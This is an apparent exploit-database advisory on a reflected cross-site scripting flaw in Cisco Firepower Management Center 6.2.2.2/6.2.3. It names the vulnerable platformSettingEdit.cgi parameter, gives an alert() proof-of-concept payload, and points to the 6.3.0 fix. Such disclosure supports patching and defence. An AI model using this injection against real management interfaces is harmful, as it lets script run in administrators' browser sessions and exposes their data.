Exploits / Vulnerability Discovered : 2019-01-28 |
Type : webapps |
Platform : hardware
This exploit / vulnerability Cisco firepower management center 6.2.2.2 / 6.2.3 crosssite scripting is for educational purposes only and if it is used you will do on your own risk!
1. Technical Description:
A vulnerability in the web-based management interface of Cisco Firepower Management Center (FMC) software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the web-based management interface of the affected software.
The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of the affected software. An attacker could exploit this vulnerability by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.
2. Proof Of Concept:
Login to Cisco Firepower Management Center (FMC) and browse to Systems -> Configuration menu.
https://<ip address>/platinum/platformSettingEdit.cgi?type=TimeSetting
Append the following XSS payload >"><script>alert("XXS POC")</script>& in the URL
The URL will become and on submitting it you'll get an alert popup.
https://<ip address>/platinum/platformSettingEdit.cgi?type=>"><script>alert("XXS POC")</script>&
3. Solution:
Upgrade to version 6.3.0
For more information about fixed software releases, consult the Cisco bug ID CSCvk30983<https://bst.cloudapps.cisco.com/bugsearch/bug/CSCvk30983>